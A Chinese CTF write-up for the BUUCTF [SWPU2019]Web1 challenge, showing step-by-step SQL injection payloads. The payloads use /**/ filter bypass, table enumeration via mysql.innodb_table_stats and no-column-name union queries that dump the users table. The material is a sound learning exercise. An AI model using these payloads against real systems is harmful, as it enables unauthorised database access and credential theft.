当前位置: 首页 > news >正文

BUUCTF-----[SWPU2019]Web1

news 来源:原创 2024/5/20 20:59:21

打开页面,原本以为是二次注入,结果不是,先注册一个账户
在这里插入图片描述
在这里插入图片描述

在申请发布广告中,发现反射性xss(然而没有什么用)
在这里插入图片描述
在这里插入图片描述

在广告申请名字中发现注入点
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

开始注入

通过一系列的测试,发现系统过滤了#,or,空格
order by不能使用,只能用union select来判断显示位
空格可以使用/**/绕过

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

在这里插入图片描述因为or被过滤,information_schema不能使用

也可以通过mysql.innodb_table_stats,来获取表名
-1'/**/union/**/select/**/1,2,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

在这里插入图片描述
表名知道了,但是列名怎么求?

这里我们使用无列名注入
1'/**/union/**/select/**/1,2,(select/**/group_concat(a)/**/from/**/(select/**/1,2/**/as/**/a,3/**/union/**/select*from/**/users)s),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

(select group_concat(a) from (select 1,2 as a,3 union select*from users)s)

(select 1,2 as a,3 union select * from users)s
//意思是:查询user表中前三列的数据,并且把第三列重命名位a(我们不知道第三列的名字是什么),然后重命名为s.
(select group_concat(a) from s)
//意思是:查询s中a的值,也就是重命名后的第3列

在这里插入图片描述
-1'/**/union/**/select/**/1,2,(select/**/group_concat(a,'~',b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)s),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

在这里插入图片描述
参考无列名注入:https://zhuanlan.zhihu.com/p/98206699

相关文章:

  • C# 协程的使用
  • DVWA靶场-暴力破解
  • 【Java EE】线程安全的集合类
  • STM32点亮LED灯与蜂鸣器发声
  • .net6Api后台+uniapp导出Excel
  • @Autowired 与@Resource的区别
  • <机器学习初识>——《机器学习》
  • 第十三届蓝桥杯嵌入式省赛程序设计详细题解
  • openvpn证书过期解决
  • SingleSpa微前端基本使用以及原理
  • vue的导入
  • HTML 01
  • requests模块的其他方法
  • HTML静态网页成品作业(HTML+CSS)——电影网首页网页设计制作(1个页面)
  • 力扣hot100:76.最小覆盖子串(滑动窗口)
  • 【108天】Java——《Head First Java》笔记(第1-4章)
  • C++回声服务器_9-epoll边缘触发模式版本服务器
  • CoolViewPager:即刻刷新,自定义边缘效果颜色,双向自动循环,内置垂直切换效果,想要的都在这里...
  • CSS实用技巧干货
  • HTTP 简介
  • JAVA并发编程--1.基础概念
  • java架构面试锦集:开源框架+并发+数据结构+大企必备面试题
  • Java知识点总结(JavaIO-打印流)
  • Netty+SpringBoot+FastDFS+Html5实现聊天App(六)
  • React的组件模式
  • SpiderData 2019年2月13日 DApp数据排行榜
  • 关于List、List?、ListObject的区别
  • 和 || 运算
  • 前端每日实战:61# 视频演示如何用纯 CSS 创作一只咖啡壶
  • 用quicker-worker.js轻松跑一个大数据遍历
  • postgresql行列转换函数
  • ​【C语言】长篇详解,字符系列篇3-----strstr,strtok,strerror字符串函数的使用【图文详解​】
  • ​sqlite3 --- SQLite 数据库 DB-API 2.0 接口模块​
  • #我与Java虚拟机的故事#连载05:Java虚拟机的修炼之道
  • (附源码)spring boot校园拼车微信小程序 毕业设计 091617
  • (蓝桥杯每日一题)平方末尾及补充(常用的字符串函数功能)
  • (学习日记)2024.03.25:UCOSIII第二十二节:系统启动流程详解
  • (一)基于IDEA的JAVA基础10
  • .bat批处理(六):替换字符串中匹配的子串
  • .bat批处理(十):从路径字符串中截取盘符、文件名、后缀名等信息
  • .chm格式文件如何阅读
  • .NET 4.0中的泛型协变和反变
  • .NET8.0 AOT 经验分享 FreeSql/FreeRedis/FreeScheduler 均已通过测试
  • .vue文件怎么使用_我在项目中是这样配置Vue的
  • /etc/skel 目录作用
  • @SuppressLint(NewApi)和@TargetApi()的区别
  • [ Algorithm ] N次方算法 N Square 动态规划解决
  • [20190416]完善shared latch测试脚本2.txt
  • [ASP.NET MVC]如何定制Numeric属性/字段验证消息
  • [C++数据结构](31)哈夫曼树,哈夫曼编码与解码
  • [Firefly-Linux] RK3568 pca9555芯片驱动详解
  • [HackMyVM]靶场 Wild
  • [Java、Android面试]_10_Java中==与equal()方法的区别?重写equal()方法?
  • [JavaWeb玩耍日记]Maven的安装与使用
  • [JS]JavaScript 简介